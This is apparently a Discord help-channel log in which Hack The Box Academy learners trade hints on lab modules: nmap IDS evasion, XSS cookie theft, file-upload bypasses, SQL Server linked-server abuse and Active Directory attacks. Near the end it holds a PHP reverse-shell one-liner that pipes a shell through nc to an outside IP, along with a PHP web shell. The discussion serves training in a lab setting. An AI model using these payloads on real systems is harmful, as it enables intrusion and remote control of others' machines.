how can i connect to user forend? the module is Bleeding Edge Vulnerabilities from Active Directory Enumeration & Attacks
Hey folks. I'm at the end of this module (https://academy.hackthebox.com/module/19/section/119), but I need help getting the proper NMAP commands to make it past the IDS/IPS. I've tried a whole host of different combinations to no avail for the past couple of hours. Can anyone point me in the right direction?
you need to add ||3dac93b8cd250aa8c1a36fffc79a17a|| as a Prefix
try some of the stuff show in the ||Firewall and IDS/IPS Evasion|| section
@vital adder That's what I've been trying. ||Switching between Syn/Ack scans, changing the source port, using decoys, changing the timing profiles, etc.|| I haven't had any luck.
hint use the ||source port|| show in the example
i did not working
also it look like you did got the flag in your previous screenshot
the 1248 length in this section is with the flag
lemme check
oh wait those cookie look right and putting the other thing as a Prefix just basically put it in front of the payload but if you do manually you don't need to add Prefix again so should already got the flag in this screenshot
What's wrong with my command?
the problem is it automatically replaces the cookie with the guest cookie instead of uploading the payload cookies
i got it
ty
can i dm you if you dont mind?
sure
Hi! Not sure if this is the right place. But it is possible to change the dark font for light font in the Hack The Box Academy.
i dont think so but you can use additional extensions to do that
Thank you!
Anyone for help at PTT attack ? At passwords attack module question 8
Hello guys, i'm new to HTB can someone explain to me how do i get the root flag ?
oh no , i think this is kind of advanced for me
HI , I AM PRI ..I AM JUST A BEGINNER AND I DO NOT KNOW WHERE TO START FROM ...PLS HELP ME AND GUIDE ME ..
THANKS
how beginner are u, cause i am also but i know how to use the command line
I AM LIKE I KNOW CODINGS AND ALL
i just figured out that i need to learn first at HTB academy
I JUST HAVE THE HACKING INTREST SO I REALLY WANT TO LEARN IT
HTB ?
ACADEMY?
LIKE HERE IN THE SERVER ?
cause in the HTB it self it will ask u to get flags through priviliage escalation and those stuff
oh so ur new to linux?
can u dm me ?
OKAY
@sturdy heath if you guys are new to this, give both of these videos a check to see what you can and should learn first
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM
I finished my path!
The basic tools are so easy to understand now I've trudged through all the theory
to get the root flag basically mean you need to hack and get the highest private user (root) of a box but this channel is for htb academy
sure shoot me a dm if you still need help with that
THANKS
I could still use some help on Shells & Payloads Host2 if anyone remembers it
sure what's the issue?
Hi there people in the Blacklist Filters section of the File Uploads module, i've been trying to execute the php code, but it gets written as HTML on the page, any tips?
Even using a dedicated php list, all the ones who pass the blacklist filter don't execute code
I'll dm if that's okay? Don't want to spoil the challenge
hint try a different extension
sure
hey guys, anyone here at Attacking Authentication Mechanisms module?
got stuck at skills assessment
I'm with that one too!
what are you stuck with?!
already solved it
I get an error while running the exploit!! got an unexpected JSON response before getting the shell!
it's the last step I guess
You can dm me if you're stuck
Thanks man
Good evening!
with what module?!
Can I get a pointer to this? It's being super slow for me
@languid dawn uhh this link looks sketchy
This link seems to be broken already
Sweet
Possibly CheckShortURL is blocked.
yep any run can run it just fine but it look like just some social media spam stuff https://app.any.run/tasks/100fee6c-3afb-45d7-9dfb-c4119e43a5d1/
Is there wireless hacking or any form of WIFI module on Academy ?
I've tried searching, couldn't find it, perhaps it's named something else. Thanks.
No, currently there are no modules about WiFi hacking
++ Thanks.
on the AD enum module, from the attack box (via rdesktop in kali) fping only returning 3 IPs, also, can't clone kerbrute. anyone else have that issue?
pretty sure most of the sections only have 3 hosts up
thx, instructions indicate 9
damn I dont remember any of em having 9, weird
I remember one of the sections I had better luck with the native ping and just bash looping it, maybe that's the one youre on.
just cause theres that many alive in the section notes doesnt means it always matches with the assessment
yep, dns is also messed up, can't resolve anything, so i can't clone kerbrute
git
kerbrute should be preinstalled
and yeah the target machines dont have external internet access, you cant download anything from the provided attack boxes unless its the pwnbox itself
LOL, it is installed, THANKS!
Is there like a general chat here?
verify your account
anyone have a nudge on grabbing the admin for the footprinting IMAP/POP3... I have all other answers but cant seem to figure out what I'm missing here.
i don't know if this is the right method but if you found the admin username just add the target domain at the end
oh that was fast but congratz
Yeah I found it earlier... there was one word too many in the part that mattered, to not spoil too much. lol
Hello, could someone help me please? I'm at Web Attacks - Skills Assessment. I found the admin user. I want to change the password. However, I get back|| "Missing parameters" from Burp Suite. I added all the parameters (3) sent to the resetPassword() function on the /settings.php page in /reset.php.|| Thanks for the help in advance.
Question on the nmap module for the medium IDS/Firewall section. This question: "After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer. " Are they asking for BIND version or the OS version of the whole box?
I've also tried the service version on port 53 but to no avail
hint you only need ||2|| value for ||2|| parameters and the second you mentioned is the right one not ||setting||
hint ||protocol||
ok thanks, but how do you know which parameters are the correct ones?
hint all of them
but that's three, isn't it? ||body: uid=${$.cookie("uid")}&token=${json['token']}&password=${$("#new_password").val()}||
i forgot the password parameters but i don't count as needing a "right value" from the target web server (also that's a bit too much spoiler even with the spoiler tag )
i mean remove parameters (too much spoiler) not the spoiler tag
I understand, thanks for the hint
All, I am having issues with defacing the website in the Cross-Site-Scripting (XSS) - Phishing Module, I am able to create the username and password field with using a payload appended with the html code but when I try to remove the image field like it says it doesn't remove it
hint for that you don't need to remove the image field
In the clean up part?
yep
ok thanks
hello
May I get a nudge with Shells and Payloads "The live engagement" host 3? I attempted the obvious exploit mentioned in the hints. Nothing. Attempted uploading asp webshell. Certutil is downloaded onto the machine but can't transfer over files/shell into the default directory path. I've been stuck for longer than I care to say.
I use the obvious one and it only works like half of the time for me, so if it doesn't work for you use the same exploit, but the module that only runs 1 command at a time, and you only need to run it twice for the flag
also off topic but anyone know which debian version I should use for parrot os 5.1.2 (not the htb version btw) on vmware?
May I dm you about the obvious exploit to ensure I am barking up the right tree?
sure
whats a quick way to enumerate where you have write access to on windows computer?
Okay so I'm doing XSS - Session Hijacking or w/e and I've grabbed the admins cookie and I'm unsure of what I might have done wrong or why what I have gotten is not correct.
|||[Sat Dec 3 18:58:29 2022] PHP 8.1.13 Development Server (http://0.0.0.0:80) started
[Sat Dec 3 18:58:47 2022] 10.129.47.138:51404 Accepted
[Sat Dec 3 18:58:47 2022] PHP Warning: Undefined array key "0.0.0.0" in /tmp/tmpserver/login.php on line 7
[Sat Dec 3 18:58:47 2022] 10.129.47.138:51404 [200]: GET /login.php?c=cookie=c00k1355h0u1d8353cu23d
[Sat Dec 3 18:58:47 2022] 10.129.47.138:51404 Closing|||
I'm having a small misunderstanding on how to grab the flag from login.php? Plz help ty love all of you
man, ive gotten so far on this web attacks module (skills assessment) without looking at anything and now im stuck...anyone got a hint? im logged in as admin looking at events page
@vital adder Have you done the AD enumeration module yet?
about to but still nope
darn the skills assessments are tough as nails
trying to figure out how to PE from a xp_cmdshell
i don't have the admin cookie save in my note (for some reason) but if that's the admin cookie in /login/ you can add a new cookie and named it "cookie" with that value (also if that's the admin cookie pls remove it here)
so are you having issue finding or exploiting the vuln?
imo that was one of the stickiest points of the assessment
I think I found an ipsec video with the way to do it
exploiting the vuln
will let you know in 10 lol
shoot me a dm on what you are trying to exploiting i don't remember anything about finding the doctype
@thorn urchin I got it, i'll dm you how if your interested. Got NT system authority
sure, I used a cheesey easy way, curious what your way was
to answer anyways, depends on the shell and the scenario.
how do you do a local login for rdp I've tried ./
I made a local user and want to see if I can login to my new user, then use mimi to pth to the other workstation
found the flag! thanks
anyone able to provide assistance with Attacking Common Services - Hard?
I am trying to interact with the sql linked server and enable XP_CMDSHELL and then possibly read the flag but im not sure on the command syntax and how it needs to be formatted?
I think xfreerdp defaults to local login unless you specify a domain, otherwise idk
Same, but it was failing. I'm guessing it didn't take my command. No way to tell since the reverse shell doesn't spit out error output
xp_cmdshell <cmd>
dunno, I dont think I used rdp once in the assessment
I used it on MS01 I dont think I ever got anything useful out of it when I think about it
I was able to steal some usless ntlm hashes
my notes got a little fuzzy around there as I got excited and blitzed towards the end. I remember generally what I did, but I dont remember what host was which lol
you finished attacking common services module? but not that simple gotta run something like
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
that must be nice as Im not making any progress lol
I can get mimikats to run pth but I cant get output from it
well remember it doesnt necessarily matter where you run pth from, so long as you have the relevant hash
I have the administrator hash
but I cant do a pth on m01 as mimi wont work properly
on sq01 it runs but my rev shell wont let me pass input to the new shell
just do it from your attack host
you can run mimikatz from linux?
almost every impacket tool will accept ntlm hashes for pth variant of whatever they do
hmm let me look up more impacket tools
at the very least itll get you a more sane shell if youre at where I think you are
Looked back at my notes, your syntax is almost there, the end of it should point back to the db your working with
I just straight up brute forced that module, it kinda felt like crap
could I dm you about it? I think I need to enable xp_cmdshell then run a dir command to read the flag but have no idea how to format the command using this Execute(function) keep getting syntax errors
sure
weird I cant initiate a dm with you. Its not allowing me could you try dming me?
getting this error message when I try
Your message could not be delivered. This is usually because you don't share a server with the recipient or the recipient is only accepting direct messages from friends. You can see the full list of reasons here: https://support.discord.com/hc/en-us/articles/360060145013
Thanks got the flag.
Been working on this XSS Session Hijacking section for about 4 hours now. If anyone is willing I'd love a nice ELI5. I've confirmed the vulnerable blind XSS parameter, I've hosted the script on a local server I'm hosting and I have not been able to reach out and grab the cookie from the admin user. I'm very close but need a bit of ELI5 help as I'm definitely missing something
I somehow got the cookie 1 time but I am not able to repeat it and it's obvious I'm lacking some understanding and would love some help ty
could sb help me with first question here? https://academy.hackthebox.com/module/81/section/787
Enumerate the target and find a vHost that contains flag No. 3. Submit the flag value as your answer (in the format HTB{DATA}).
anyone knows how to fix that? module: Information Gathering - Web Edition
i got the first 2 flags
Need help with the Skills Assessment part of Using Web Proxies for the question 3 :
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I tried to fuzzle the answer by prefixing the 31 characters long decoded cookie and then encoding it 2 times, but I can't get it to work
So you fuzzed the prefix. That didn't work.
What happens when you fuzz after 31~
I added the list of possible characters, then added as payloads the prefix of 31 characters and the 2 encryptions in that order, which gave me a string of 88 characters as indicated in the hint. However all the responses I get are the same length. Did I miss something ?
Did you try with curl?
If so dm to share your command
And see what we can do
i did and also dm'd you
Hello. What about "Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer." I changed the script's range() function to work from 376370-376380 with step 1 but it does not show any result.
Can I get some help on enumeration? I'm struggling to understand the IDS/IPS Evasion and could use some aid in how to get a System OS from filtered ports.
Network Enumeration -> Firewall and IDS/IPS Evasion - Easy Lab
I have read through the module a few times, but I think I'm just ticking over in the head a bit maybe ^^;
the nmap thing right?
Yep
i think the solution was under the mentioned "Used Scanning Options" u should use the source port thing and an ack scan i think but its a long time ago im not sure
Oh yeah I know- but I was more looking to see if anyone had the time to explain it further to me
what exactly?
Well I wanted to understand how the DNS Proxying actually works
On a logical level
Like how come it works whilst using Fragmentation and Timing doesn't when you're trying to find Information ?
in the first case nmap calls another dns server that is more trusted in the second nmap pretends to be a dns server by using port 53 as source port..
i need help with AD Enumeration & Attacks - Skills Assessment Part II
Hi, my name is Sarah and I was wondering if anyone could help me out with solving the question in the one before last section ("Shellcoding Tools") of "Intro To Assembly Language".
I'm extremely stuck there, have been pretty much trying for a couple of hours and still cant find the right way to solve it. I'd appreciate anything, especially if one could guide me to the solution (in case of voice call, ill be available in 2 hours from now), and even just the answer itself might help get me on the correct track.
thank you!
I'm at the "skills assessment - service login" of "login brute forcing", can someone give me a hint how to build the personalized wordlist? I tried a lot already..
As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.
the number 736373 doesnt exist between 376370 and 376380
np
@thorn urchin Sorry, got the id wrong. in the script i iterate over the range (736370-736380 ) with step 1:)
Sir
You can watch this video
Let me get it
Thanksthanks
@strange aspen still need help?
y
go dm
Hello!
For questions - AD Enumeration & Attacks - Skills Assessment Part II
I have only two steps left to take.
Logining to DC01, taking the flag and get the NTLM hash for the KRBTGT account.
But I can't figure out how to get to DC01.
On the MS01 machine, I am a full-fledged administrator.
How to move to DC01 with her?
Maybe you need to add a user on DC01 to the "Remote Management Users" group, but how?
Hello, I'm at Web Attacks - Skills Assessment. I found the admin user and tried to change the password. But I get the message Access Denied. I tried to change the cookie UID to ||52|| in the browser. It says I'm the admin user but I don't have any advanced options. Do I still have to change the password?
hint ||read the HTTP Verb Tampering section||
thank you
@undone cypress can i dm you?
surely
Having issues with getting past a tcp wrapped service in Enumeration, I've used NMAP and NCAT but NCAT just time out on me- can anyone point me in the right direction?
Which module?
Enumeration-> Avoiding IPS/IDS Hard Lab
I've been using NC and it's timing out- is that an issue with what I'm doing or an issue with my internet-
What is the source port that you are instructing nc to use when attempting to connect?
That is the destination port, not the source port...
Ah sorry, source port is 53
Set the source address to your IP and you should be good to go
How about changing the password for the domain admin then connecting using wmiexec.py?
Question 11 or?
You crack the hash in there
Inveigh.ps1?
Still just getting timeouts ^^;
Did you run lazagne.exe
DM me
I can't remember if I did or not. If that was the answer, then I feel like I should have figured it out.
but I feel like I remember that the CT*** user had no persistence, so that doesn't seem right.
In question 8, how did you escalate privileges?
Can I DM you?
Sure
@thorn urchin Finally finished it, wow what an "assessment", that was a full on box lol
but no matter which method I use, I always get the message "Access Denied" or "Missing parameters".
Did you update the URL parameters, if you went with GET?
I changed the uid, token and cookie uid
But are they sent with the query string or?
If they are still sent within the request body it won't work
congrats
Hi guys, I'm having problems in the File Upload Attacks Module - Whitelist Filters exercise. I am able to upload the file but I keep getting "Not Found" responses when browsing to its address in ||/profile_images||
A helping hand would be great, thanks
theres a couple of false positives when uploading
if its one of the \x00 in the extension name itll pass but its no good
I've tried various
/ , .\ , :
did you try the bash script wordlist generator they give you?
I tried using the extensions
did you use the generator script from the lesson
Disabled URL-encoding option in Burp?
this is why name like may not work (i'm too lazy to type this again) #modules message
I don't understand, why teach something if it's not going to work?
it does work, youre misunderstanding
Yeah, I'm confused
there are some variations that will work, and some that dont depending on the situation
now again
yes or no
not all special characters or the thing with % can be url encoded so some of them will work
did you use the bash script they give you to generate a wordlist?
Yeah
Thanks, I will now try it
i try to do the first question of Meterpreter Tunneling & Port Forwarding but i only have 1 IP in return or 0
Please can anyone here help me track a stolen phone, am still new please
nope
no
if that's the right network interface just use the module as normal (not in the meterpreter shell)
Ok thanks
np
I did go over it and changed the filename to make sure it was in sync but none of the lines in the wordlist generated by the script have given out a successful response
They're all "only images are allowed"
Hello! Could anyone give me a small hint for the Password Attacks Lab - Easy? Nmap found just FTP and SSH. Tried Bruteforcing FTP first, as that is quicker and more reliable than SSH. I used the provided username.list and password.list, created mutations with provided custom.rules, no yield. I can bruteforce SSH as well, but that would probably take much longer than the machine timeout. Tried some default passwords and modifications, no results either.
@patent whale ftp allows anonymous login
What? I swear that was the first thing I tried and didn't get in. Will try again.
Just increase the thread count, should be able to find it using the default username and password list
Did -t 64 for FTP.
try resetting the box and you shouldnt need to run the modified password list here
Reverted the machine, trying again. We'll see. Thanks for the tips, @pastel ginkgo and @placid quest
@pearl torrent what do u need?
I figured it out lol
nice
so i just gave that section a try and i did use the bash script to make the wordlist but instead of 2 extensions i used all extensions from the web-extensions.txt (in seclist) and that gave me 1404 extensions and when uploaded 574 worked but only 4 gave me RCE but the first time i did this i just manually tried the extensions in burp repeater or something and that worked for me
update: i was able to get 12 RCE shell working by adding some extension into web-extensions.txt
can i dm you for the second questions ?
sure
bruh this guy is the saviour for noobies like us 
W fr
Anyone able to give me a push on the SQL Injection Skills Assessment, the last exercise? Have RCE but stuck on priv escalation to read the flag in the root directory
hi
nvm think i got it... thought too much haha
Could I DM someone who has completed Password Attacks Network Services?
Feel free to DM me
good afternoon everyone, I am a bit stuck on this exercise, I have tried to decode the cookie in burp suite and in online decoders and it has not been possible, I ask for some guidance thank you very much.
The /admin.php page uses a cookie that has been encoded several times. It tries to decode the cookie until it gets a value of 31 characters. It sends the value as a response.
Skills Assessment - Using Web Proxies
@red obsidian not sure if this is the correct spot, but I haven't been able to purchase cubes, subscribe, or purchase a model on HackTheBox Academy for the last 3 days. Not sure if there's an issue on their side or mine. Anyone else experience this currently?
This SSH attack is going to take 25hrs max
@rustic sage which ssh
it shouldnt take that long
Stuck on Blind Site Scripting Lab, has anyone done that lately that could point me in the right direction
netcat doesn't print back reverse shell (doing nibbles box), how do i check my tun0 vpn ip to make sure it's correct?
It shouldn't but it is
Unless someone can DM me the pass to speed it up, I'm gonna have to wait
Probably password1 or something
oop it just finished
which module is it?
Got the password thankfully hehehe
nice!
Someone for "Attacking Common Services - Hard" section?
@flat oxide where are u stuck
I found the linked server and the testadmin user
But I don't know where find any admin credentials
@flat oxide do u think it is like that
I'm trying to run some command on the linked server but i didn't find anything
so idk
So I'm sure this is a total noob question but... With attacking AD, after I've done the DCSync, grabbed KRBTGT and made a golden ticket, how do I use that golden ticket to actually access things like... Say I want to check Filesystem on the Domain Controller.
If you're on linux you point your KRB5CCNAME to it
it should get passed when you authenticate
I'm on a windows host. I've loaded the ticket for domain\Administrator into memory and tried SMB and WinRM (remote powershell) but both failed. Can't even hit a c$ share.
klist is showing the right tickets, I'm just not having much luck using it to actually access anything on the DC
I'm working on the IDS/IPS Evasion - Easy module. I can work out that it's a Linux machine, but that's not the correct answer so I can only assume it wants the distribution. Does anyone have any tips for how to determine that?
nmap -sV
id recommend getting intimately familiar with nmap you will use it on every.single.machine.
I think I got it
you asked the very same question I did when I was going through that module
good luck on the assessment its a beast.
nope this isn't the correct spot and that's a bot but if you are having that issue contact support
ask that in #boxes but if can't access or see that channel use ++verify at #bot-commands
it's part of the getting started module
oh that one
so what's the issue? if you need to check your ip then use ifconfig
so i put a reverse shell in a php file and uploaded it as an image to the website (it uploads fine and prints text if i make it do that), but netcat won't pickup the code when listening
reverse shell code: <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
the thing that you decoded is a part of a cookie, you need to use the wordlist on the question so make the full cookie and after that use something like burp intruder to re-encode and send the cookie back to target and if you hit the right cookie you will get the flag
so are you sure nc is installed on the target machine?
yes
use this php payload to get RCE and from there it's easier to get a rev shell <?php system($_GET['cmd']); ?>
i received nothing from this
use ?cmd= to run command
where?
<?php system($_GET['cmd']); (shell).php?cmd=id?>
?
i got 0 idea what you are trying to do here?
lemme dm you
sure
Thank you so much
On the Using Web Proxies module, how do I solve the burp intruder question using something like gobuster. I dont feel like repeating the password attacks module and sitting here all night
As I thought I was running gobuster correctly and I found index.html but the page is blank
it's easier to use ffuf instead of gobuster for this (nvm i forgot about the -x) and if you still want to use intruder but don't want to wait remove the first ||100|| words
intruder is already at 215 results and no hits yet
im not super familiar with ffuf
let me give this a check and i'll try with ffuf after that i'll send you the command but for the fuzzing you can use something like /admin/FUZZ.html
all you need is ||ffuf -u http://IP/admin/FUZZ.html -w /opt/useful/SecLists/Discovery/Web-Content/common.txt||
so i just try with intruder and it's working fine for me check if you got any request with ||1263|| length
Sweet found it both ways at the same exact time
learned a tool I will actually use vs one I wont use because of the paywall for intruder
im having some trouble with shell & payload skill assessment host 3
i got antak.aspx to work but it cant read the flag in C:\Users\Administrator\Desktop\Skills-flag.txt because it has no admin privilege
eternal blue doesnt work so i tried admin/smb/ms17_010_command
with the command: cat C:\Users\Administrator\Desktop\Skills-flag.txt
everything works fine but it doesnt print the output in metasploit
yeah esp come the file uploads module. it wants you to use burp intruder for everything and that's crazy, I used ffuf for the whole thing
yeah burp is a great tool but the paywall sucks
Is the ffuf module good at covering those use cases?
use type
oh yeah right
Id say so. you still have to apply some critical thinking to adapt it to the situation but all the tools are there.
also thanks for the ffuf, jesus christ those commands saved me a lot of time testing
ofc